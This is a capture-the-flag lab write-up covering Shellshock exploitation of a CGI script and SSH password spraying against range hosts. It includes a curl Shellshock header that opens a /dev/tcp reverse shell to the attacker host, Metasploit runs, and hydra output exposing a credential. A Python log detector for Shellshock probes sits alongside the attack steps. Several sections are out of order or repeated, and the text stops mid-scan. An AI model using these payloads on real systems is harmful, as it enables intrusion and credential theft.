Advanced Penetration Testing Techniques - CTF Range (3)


Posted by nathan2009729 on 2023-05-08

Next challenge:

Start by scanning the ports:

┌──(root㉿kali)-[~]
└─# nmap -p- 172.16.30.5
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-26 03:29 EDT
Nmap scan report for 172.16.30.5
Host is up (0.062s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 31.56 seconds

┌──(root㉿kali)-[~]
└─# nmap -p22,80 172.16.30.5 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-26 03:31 EDT
Nmap scan report for 172.16.30.5
Host is up (0.013s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 bea6be097c4c944dd7749fda9667c066 (DSA)
|   2048 dfce564cb463a7e54cfc9ac39e2ed086 (RSA)
|   256 191cd822c8c17fc2e2c2ae8e89ab5b0d (ECDSA)
|_  256 684fc8c87b3537ee07a56f67b715439b (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.7 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 3.10 - 3.16 (93%), Linux 3.16 (92%), Linux 3.13 (91%), Linux 3.18 (90%), Linux 3.10 - 3.12 (89%), Linux 3.10 - 4.11 (89%), Linux 3.12 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   61.44 ms 192.168.200.1
2   11.16 ms 172.16.30.5

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.52 seconds

Port 80 is open, so first enumerate the directories behind it:

┌──(root㉿kali)-[~]
└─# nikto -host http://172.16.30.5
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          172.16.30.5
+ Target Hostname:    172.16.30.5
+ Target Port:        80
+ Start Time:         2023-03-26 04:04:13 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /, inode: 2cf6, size: 5e19588e4cd5f, mtime: gzip
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8726 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2023-03-26 04:06:49 (GMT-4) (156 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

┌──(root㉿kali)-[~]
└─# dirb http://172.16.30.5

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Mar 26 04:08:40 2023
URL_BASE: http://172.16.30.5/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://172.16.30.5/ ----
==> DIRECTORY: http://172.16.30.5/cgi-bin/
+ http://172.16.30.5/cgi-bin/ (CODE:403|SIZE:286)
+ http://172.16.30.5/index.html (CODE:200|SIZE:11510)
+ http://172.16.30.5/server-status (CODE:403|SIZE:291)

---- Entering directory: http://172.16.30.5/cgi-bin/ ----
+ http://172.16.30.5/cgi-bin/keygen (CODE:200|SIZE:153)

-----------------
END_TIME: Sun Mar 26 04:10:36 2023
DOWNLOADED: 9224 - FOUND: 4

dirb turned up very few directories, so try gobuster instead:

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://172.16.30.5 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.16.30.5
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Timeout:                 10s
===============================================================
2023/03/26 04:15:57 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 283]
/cgi-bin              (Status: 301) [Size: 311] [--> http://172.16.30.5/cgi-bin/]
/.htm                 (Status: 403) [Size: 282]
/.                    (Status: 200) [Size: 11510]
/.htaccess            (Status: 403) [Size: 287]
/.htc                 (Status: 403) [Size: 282]
/.html_var_DE         (Status: 403) [Size: 290]
/server-status        (Status: 403) [Size: 291]
/.htpasswd            (Status: 403) [Size: 287]
/.html.               (Status: 403) [Size: 284]
/.html.html           (Status: 403) [Size: 288]
/.htpasswds           (Status: 403) [Size: 288]
/.htm.                (Status: 403) [Size: 283]
/.htmll               (Status: 403) [Size: 284]
/.html.old            (Status: 403) [Size: 287]
/.html.bak            (Status: 403) [Size: 287]
/.ht                  (Status: 403) [Size: 281]
/.htm.htm             (Status: 403) [Size: 286]
/.hta                 (Status: 403) [Size: 282]
/.htgroup             (Status: 403) [Size: 286]
/.html1               (Status: 403) [Size: 284]
/.html.printable      (Status: 403) [Size: 293]
/.html.LCK            (Status: 403) [Size: 287]
/.htm.LCK             (Status: 403) [Size: 286]
/.htaccess.bak        (Status: 403) [Size: 291]
/.html.php            (Status: 403) [Size: 287]
/.htx                 (Status: 403) [Size: 282]
/.htmls               (Status: 403) [Size: 284]
/.html-               (Status: 403) [Size: 284]
/.htm2                (Status: 403) [Size: 283]
/.htlm                (Status: 403) [Size: 283]
/.htuser              (Status: 403) [Size: 285]
/.htacess             (Status: 403) [Size: 286]
/.htm.d               (Status: 403) [Size: 284]
/.htm.html            (Status: 403) [Size: 287]
/.htm.old             (Status: 403) [Size: 286]
/.html-1              (Status: 403) [Size: 285]
/.html.orig           (Status: 403) [Size: 288]
/.html_               (Status: 403) [Size: 284]
/.html.sav            (Status: 403) [Size: 287]
/.htmlprint           (Status: 403) [Size: 288]
/.htmlpar             (Status: 403) [Size: 286]
/.html_files          (Status: 403) [Size: 289]
/.hts                 (Status: 403) [Size: 282]
/.htaccess.old        (Status: 403) [Size: 291]
/.htm.rc              (Status: 403) [Size: 285]
/.htm.bak             (Status: 403) [Size: 286]
/.htm8                (Status: 403) [Size: 283]
/.htm7                (Status: 403) [Size: 283]
/.htm5                (Status: 403) [Size: 283]
/.htm3                (Status: 403) [Size: 283]
/.html-0              (Status: 403) [Size: 285]
/.html--              (Status: 403) [Size: 285]
/.htm_                (Status: 403) [Size: 283]
/.html.htm            (Status: 403) [Size: 287]
/.html-p              (Status: 403) [Size: 285]
/.html-old            (Status: 403) [Size: 287]
/.html-c              (Status: 403) [Size: 285]
/.html-2              (Status: 403) [Size: 285]
/.html.inc            (Status: 403) [Size: 287]
/.html.pdf            (Status: 403) [Size: 287]
/.html.none           (Status: 403) [Size: 288]
/.html.images         (Status: 403) [Size: 290]
/.html7               (Status: 403) [Size: 284]
/.html5               (Status: 403) [Size: 284]
/.html4               (Status: 403) [Size: 284]
/.html.txt            (Status: 403) [Size: 287]
/.html.start          (Status: 403) [Size: 289]
/.htmla               (Status: 403) [Size: 284]
/.html_old            (Status: 403) [Size: 287]
/.htmlDolmetschen     (Status: 403) [Size: 294]
/.htmlBAK             (Status: 403) [Size: 286]
/.htmlu               (Status: 403) [Size: 284]
/.htmlq               (Status: 403) [Size: 284]
/.htmlfeed            (Status: 403) [Size: 287]
/.htmlc               (Status: 403) [Size: 284]
/.htn                 (Status: 403) [Size: 282]
Progress: 119405 / 119601 (99.84%)
===============================================================
2023/03/26 04:20:21 Finished
===============================================================

Run gobuster against the next level, cgi-bin, as well:

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://172.16.30.5/cgi-bin -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -s 200,301 --status-codes-blacklist ''
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:            http://172.16.30.5/cgi-bin
[+] Method:         GET
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
[+] Status codes:   200,301
[+] User Agent:     gobuster/3.4
[+] Timeout:        10s
===============================================================
2023/03/26 04:29:30 Starting gobuster in directory enumeration mode
===============================================================
/keygen               (Status: 200) [Size: 153]
Progress: 119504 / 119601 (99.92%)
===============================================================
2023/03/26 04:33:51 Finished
===============================================================

-s 200,301 --status-codes-blacklist '' means only paths returning these two status codes are listed, i.e. only paths that actually exist and are accessible (gobuster refuses to run with both a whitelist and its default 404 blacklist set, so the blacklist has to be cleared explicitly). So let's take a look at keygen:

Seeing Apache together with cgi-bin, the first instinct is Shellshock:

msf6 > search shellshock

Matching Modules
================

   #   Name                                               Disclosure Date  Rank       Check  Description
   -   ----                                               ---------------  ----       -----  -----------
   0   exploit/linux/http/advantech_switch_bash_env_exec  2015-12-01       excellent  Yes    Advantech Switch Bash Environment Variable Code Injection (Shellshock)
   1   exploit/multi/http/apache_mod_cgi_bash_env_exec    2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
   2   auxiliary/scanner/http/apache_mod_cgi_bash_env     2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
   3   exploit/multi/http/cups_bash_env_exec              2014-09-24       excellent  Yes    CUPS Filter Bash Environment Variable Code Injection (Shellshock)
   4   auxiliary/server/dhclient_bash_env                 2014-09-24       normal     No     DHCP Client Bash Environment Variable Code Injection (Shellshock)
   5   exploit/unix/dhcp/bash_environment                 2014-09-24       excellent  No     Dhclient Bash Environment Variable Injection (Shellshock)
   6   exploit/linux/http/ipfire_bashbug_exec             2014-09-29       excellent  Yes    IPFire Bash Environment Variable Injection (Shellshock)
   7   exploit/multi/misc/legend_bot_exec                 2015-04-27       excellent  Yes    Legend Perl IRC Bot Remote Code Execution
   8   exploit/osx/local/vmware_bash_function_root        2014-09-24       normal     Yes    OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
   9   exploit/multi/ftp/pureftpd_bash_env_exec           2014-09-24       excellent  Yes    Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
   10  exploit/unix/smtp/qmail_bash_env_exec              2014-09-24       normal     No     Qmail SMTP Bash Environment Variable Injection (Shellshock)
   11  exploit/multi/misc/xdh_x_exec                      2015-12-04       excellent  Yes    Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution


Interact with a module by name or index. For example info 11, use 11 or use exploit/multi/misc/xdh_x_exec

Use module 2 first to scan whether the vulnerability is really there:

msf6 > use 2
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > show options

Module options (auxiliary/scanner/http/apache_mod_cgi_bash_env):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CMD        /usr/bin/id      yes       Command to run (absolute paths required)
   CVE        CVE-2014-6271    yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-20
                                         14-6278)
   HEADER     User-Agent       yes       HTTP header to use
   METHOD     GET              yes       HTTP method to use
   Proxies                     no        A proxy chain of format type:host:port[,type:host:por
                                         t][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/d
                                         ocs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI                   yes       Path to CGI script
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set rhosts 172.16.30.5
rhosts => 172.16.30.5
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > run

[-] Msf::OptionValidateError The following options failed to validate: TARGETURI
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set TARGETURI /cgi-bin/keygen
TARGETURI => /cgi-bin/keygen
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > run

[+] uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

A way to test for Shellshock by hand:

Test Whether a Server Is Vulnerable to Shellshock Bug | Baeldung on Linux

Following that page, the command is:

┌──(root㉿kali)-[/home/kali/LPT_day1]
└─# curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" http://172.16.30.5/cgi-bin/keygen
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator at
 webmaster@localhost to inform them of the time this error occurred,
 and the actions you performed just before this error.</p>
<p>More information about this error may be available
in the server error log.</p>
<hr>
<address>Apache/2.4.7 (Ubuntu) Server at 172.16.30.5 Port 80</address>
</body></html>

You can see that /etc/passwd was not read out.

Change the command above so that, instead of reading passwd, it opens a reverse connection:

curl -H "User-Agent: () { :; }; /bin/bash - >& /dev/tcp/192.168.200.4/443 0>&1" http://172.16.30.5/cgi-bin/keygen

Before running that command, open another terminal and start a listener:

┌──(root㉿kali)-[~]
└─# nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.200.4] from (UNKNOWN) [172.16.30.5] 49109
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html/cgi-bin$

The reverse shell comes back successfully.

www-data@ubuntu:/var/www/html/cgi-bin$ cd /
cd /
www-data@ubuntu:/$ find / -name secret.txt -print 2>/dev/null
find / -name secret.txt -print 2>/dev/null
/home/jason/Documents/secret.txt
www-data@ubuntu:/$ cat /home/jason/Documents/secret.txt
cat /home/jason/Documents/secret.txt
hb74kpm9h83

Below is the nmap command from the page linked above:

┌──(root㉿kali)-[/home/kali/LPT_day1]
└─# nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/keygen,cmd=ls 172.16.30.5
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-26 05:09 EDT
Nmap scan report for 172.16.30.5
Host is up (0.019s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-shellshock:
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.
|
|     Disclosure date: 2014-09-24
|     Exploit results:
|       <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
|   <html><head>
|   <title>500 Internal Server Error</title>
|   </head><body>
|   <h1>Internal Server Error</h1>
|   <p>The server encountered an internal error or
|   misconfiguration and was unable to complete
|   your request.</p>
|   <p>Please contact the server administrator at
|    webmaster@localhost to inform them of the time this error occurred,
|    and the actions you performed just before this error.</p>
|   <p>More information about this error may be available
|   in the server error log.</p>
|   <hr>
|   <address>Apache/2.4.7 (Ubuntu) Server at 172.16.30.5 Port 80</address>
|   </body></html>
|
|     References:
|       http://www.openwall.com/lists/oss-security/2014/09/24/10
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|       http://seclists.org/oss-sec/2014/q3/685
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|_http-server-header: Apache/2.4.7 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.14 seconds
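Both the manual curl test and the nmap script above get a 500 page back from /cgi-bin/keygen even though the injected command runs. As an added example, not code from the original post, here is a Python detector a defender could run over Apache combined-format access logs to surface such probes; the sample log lines are constructed and the 172.16.30.9 client address is invented.

```python
import re

# Bash function-definition prefix that the CVE-2014-6271 parser acted on:
# "() {" followed by a body and, after the closing "}", a trailing command.
# Flagging the "() {" prefix alone is enough to catch an attempt, whatever follows.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# One quoted field of an Apache "combined" log line; it may contain \" escapes.
_Q = r'"((?:[^"\\]|\\.)*)"'
COMBINED_RE = re.compile(
    r"^(\S+) \S+ \S+ \[([^\]]+)\] " + _Q + r" (\d{3}) (\S+) " + _Q + " " + _Q + "$"
)

# Constructed sample lines modelled on the requests in this write-up; they are
# not captured from the range. 172.16.30.9 is an invented client address.
SAMPLE_ACCESS_LOG = [
    '172.16.30.9 - - [26/Mar/2023:04:08:40 -0400] "GET /index.html HTTP/1.1" 200 11510 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.168.200.4 - - [26/Mar/2023:05:09:12 -0400] "GET /cgi-bin/keygen HTTP/1.1" 500 614 "-" "() { :; }; /usr/bin/id"',
    '192.168.200.4 - - [26/Mar/2023:05:09:13 -0400] "GET /cgi-bin/keygen HTTP/1.1" 200 153 "-" "curl/7.88.1"',
    '192.168.200.4 - - [26/Mar/2023:05:10:01 -0400] "GET /cgi-bin/keygen HTTP/1.1" 500 614 "() { :; }; /usr/bin/id" "Mozilla/5.0"',
    "this line is not in combined log format",
]


def parse_combined(line):
    """Parse one combined-format access log line into a dict, or return None."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    ip, ts, request, status, size, referer, ua = m.groups()
    parts = request.split(" ")
    path = parts[1] if len(parts) >= 2 else request
    return {"ip": ip, "time": ts, "path": path, "status": int(status),
            "size": size, "referer": referer, "user_agent": ua}


def is_shellshock_attempt(entry):
    """True when a logged request header carries the '() {' function prefix."""
    return any(SHELLSHOCK_RE.search(entry[k]) for k in ("user_agent", "referer"))


def scan_access_log(lines):
    """Return (ip, path, status) for every line that looks like a Shellshock probe.

    The status code is reported but not used as evidence: under mod_cgi the
    injected command runs before the script prints its own headers, so Apache
    sees a malformed header block, answers 500 and drops the command's output.
    That is why the curl test above got a 500 page even though the nmap script
    and the Metasploit scanner both confirmed execution. The header pattern,
    not the status, is the indicator to alert on.
    """
    hits = []
    for line in lines:
        entry = parse_combined(line)
        if entry and is_shellshock_attempt(entry):
            hits.append((entry["ip"], entry["path"], entry["status"]))
    return hits


if __name__ == "__main__":
    for ip, path, status in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"shellshock probe from {ip} against {path} (HTTP {status})")
```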

Once Shellshock is confirmed, Metasploit can also be used to exploit it:

┌──(root㉿kali)-[~]
└─# msfconsole


       =[ metasploit v6.3.2-dev                           ]
+ -- --=[ 2290 exploits - 1201 auxiliary - 409 post       ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: View advanced module options with
advanced
Metasploit Documentation: https://docs.metasploit.com/

msf6 > search shellshock

msf6 > use 1
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options

Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CMD_MAX_LENGTH  2048             yes       CMD max line length
   CVE             CVE-2014-6271    yes       CVE to check/exploit (Accepted: CVE-2014-6271, C
                                              VE-2014-6278)
   HEADER          User-Agent       yes       HTTP header to use
   METHOD          GET              yes       HTTP method to use
   Proxies                          no        A proxy chain of format type:host:port[,type:hos
                                              t:port][...]
   RHOSTS                           yes       The target host(s), see https://docs.metasploit.
                                              com/docs/using-metasploit/basics/using-metasploi
                                              t.html
   RPATH           /bin             yes       Target PATH for binaries used by the CmdStager
   RPORT           80               yes       The target port (TCP)
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is ran
                                              domly generated)
   TARGETURI                        yes       Path to CGI script
   TIMEOUT         5                yes       HTTP read response timeout (seconds)
   URIPATH                          no        The URI to use for this exploit (default is rand
                                              om)
   VHOST                            no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This
                                       must be an address on the local machine or 0.0.0.0 to l
                                       isten on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.18.193   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux x86



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set lport 443
lport => 443
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set rhosts 172.16.30.5
rhosts => 172.16.30.5
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi /cgi-bin/keygen
targeturi => /cgi-bin/keygen
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set lhost 192.168.200.4
lhost => 192.168.200.4
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run

[*] Started reverse TCP handler on 192.168.200.4:443
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (1017704 bytes) to 172.16.30.5
[*] Meterpreter session 1 opened (192.168.200.4:443 -> 172.16.30.5:49110) at 2023-03-26 05:58:00 -0400

meterpreter >

Module 1 was chosen because its name contains Apache, which matches the current environment. Once the compromise succeeds, start looking for the file:

meterpreter > shell
Process 3177 created.
Channel 1 created.
find / -name secret.txt -print 2>/dev/null
/home/jason/Documents/secret.txt
cat /home/jason/Documents/secret.txt
hb74kpm9h83

The usual recon:

┌──(root㉿kali)-[/home/kali]
└─# nmap -p- 172.16.20.7
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-26 03:42 EDT
Nmap scan report for 172.16.20.7
Host is up (0.039s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 30.31 seconds

┌──(root㉿kali)-[/home/kali]
└─# nmap -p22 172.16.20.7 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-26 03:43 EDT
Nmap scan report for 172.16.20.7
Host is up (0.020s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 1619792a62e3e6e83345234167c17b99 (RSA)
|   256 4d34eb934802773e1160177936e1bb4f (ECDSA)
|_  256 f38fb12d46333961a74faf68320c0310 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.12 (94%), Linux 4.4 (94%), Linux 3.10 (93%), Linux 3.10 - 3.16 (93%), Linux 4.9 (93%), Linux 4.0 (93%), Linux 2.6.18 (90%), Linux 3.10 - 4.11 (89%), Linux 3.11 - 4.1 (89%), Linux 3.2 - 4.9 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   62.31 ms 192.168.200.1
2   10.14 ms 172.16.20.7

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.80 seconds

Only SSH is open, so brute-force it. Note that the username and password files must be the officially provided ones. Also note that if you run the following command directly:

hydra -L Usernames-CPENT.txt -P Passwords-CPENT.txt ssh://172.16.20.7

it takes a long time, so use a password-spraying attack instead; see the following page for details:

Using Hydra to Spray User Passwords

In short, add the -u parameter at the end.

┌──(root㉿kali)-[/home/kali/LPT_day1]
└─# hydra -L Usernames-CPENT.txt -P Passwords-CPENT.txt ssh://172.16.20.7 -u
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-26 03:53:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1820 login tries (l:35/p:52), ~114 tries per task
[DATA] attacking ssh://172.16.20.7:22/
[22][ssh] host: 172.16.20.7   login: jason   password: qwerty
[STATUS] 322.00 tries/min, 322 tries in 00:01h, 1501 to do in 00:05h, 13 active
[STATUS] 317.67 tries/min, 953 tries in 00:03h, 871 to do in 00:03h, 12 active
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 9 final worker threads did not complete until end.
[ERROR] 9 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-26 03:57:36

The brute force succeeded; log in over SSH:

┌──(root㉿kali)-[/home/kali/LPT_day1]
└─# ssh jason@172.16.20.7
The authenticity of host '172.16.20.7 (172.16.20.7)' can't be established.
ED25519 key fingerprint is SHA256:4uiYffWeZsCsbqxYDpnCxpCpI9a5xqSAytffNxlSD60.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.16.20.7' (ED25519) to the list of known hosts.
jason@172.16.20.7's password:
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Mar 26 18:13:49 CST 2023

  System load:  0.0                Processes:           119
  Usage of /:   3.2% of 124.01GB   Users logged in:     2
  Memory usage: 11%                IP address for eth0: 172.16.20.7
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

298 packages can be updated.
196 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sat Sep 24 10:01:15 2022 from 172.16.1.1
jason@ubuntu:~$

With a shell, start looking for the first flag:

jason@ubuntu:~$ cd /
jason@ubuntu:/$ find -name userflag.txt -print 2>/dev/null
./home/jason/Documents/userflag.txt
jason@ubuntu:/$ cat ./home/jason/Documents/userflag.txt
bu79g82xap
jason@ubuntu:/$ md5sum ./home/jason/Documents/userflag.txt
c43b63f879784511a5914c7ee930d5bf  ./home/jason/Documents/userflag.txt

Next comes privilege escalation, so the enumeration scripts (LinEnum and linpeas) need to get onto the target; first start a simple HTTP server:

┌──(root㉿kali)-[/home/kali]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Change to /tmp, which is writable:

jason@ubuntu:/$ cd /tmp
jason@ubuntu:/tmp$ wget http://192.168.200.4/LinEnum.sh
--2023-03-26 18:24:20--  http://192.168.200.4/LinEnum.sh
Connecting to 192.168.200.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: ‘LinEnum.sh’

LinEnum.sh              100%[===============================>]  45.54K  --.-KB/s    in 0.06s

2023-03-26 18:24:20 (804 KB/s) - ‘LinEnum.sh’ saved [46631/46631]

jason@ubuntu:/tmp$ ls -al
total 88
drwxrwxrwt 10 root  root   4096 Mar 26 18:24 .
drwxr-xr-x 23 root  root   4096 Dec 23  2021 ..
drwxrwxrwt  2 root  root   4096 Dec 23  2021 .font-unix
drwxrwxrwt  2 root  root   4096 Dec 23  2021 .ICE-unix
-rw-rw-r--  1 jason jason 46631 Mar 12 16:03 LinEnum.sh
drwx------  3 root  root   4096 Dec 23  2021 systemd-private-8a779ead8eb64e009842b22ee304b506-systemd-resolved.service-T3HiFE
drwx------  3 root  root   4096 Dec 23  2021 systemd-private-8a779ead8eb64e009842b22ee304b506-systemd-timesyncd.service-tZ652O
drwxrwxrwt  2 root  root   4096 Dec 23  2021 .Test-unix
drwx------  2 itop  itop   4096 Feb 23  2022 tmux-1000
drwxrwxrwt  2 root  root   4096 Dec 23  2021 .X11-unix
drwxrwxrwt  2 root  root   4096 Dec 23  2021 .XIM-unix
jason@ubuntu:/tmp$ chmod +x LinEnum.sh

用同樣手法,讓靶機下載linpeas這個腳本:

5 (Challenge 29) Compromise the machine with IP address 172.25.20.7, find the file userflag.txt and enter its content as the answer.

6 (Challenge 30) Compromise the machine with IP address 172.25.20.7, find the file rootflag.txt, and enter its content as the answer.

From these two challenges the plan is clear: first get a shell and grab userflag.txt, then escalate privileges for rootflag.txt. Note that the challenge text says 172.25.20.7, while the range host actually answers at 172.16.20.7 (the login banner later confirms eth0 is 172.16.20.7); the scans below use the latter.

Start with a scan:

┌──(root㉿kali)-[/home/kali]
└─# nmap -p- 172.16.20.7
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-26 03:42 EDT
Nmap scan report for 172.16.20.7
Host is up (0.039s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 30.31 seconds

┌──(root㉿kali)-[/home/kali]
└─# nmap -p22 172.16.20.7 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-26 03:43 EDT
Nmap scan report for 172.16.20.7
Host is up (0.020s latency).

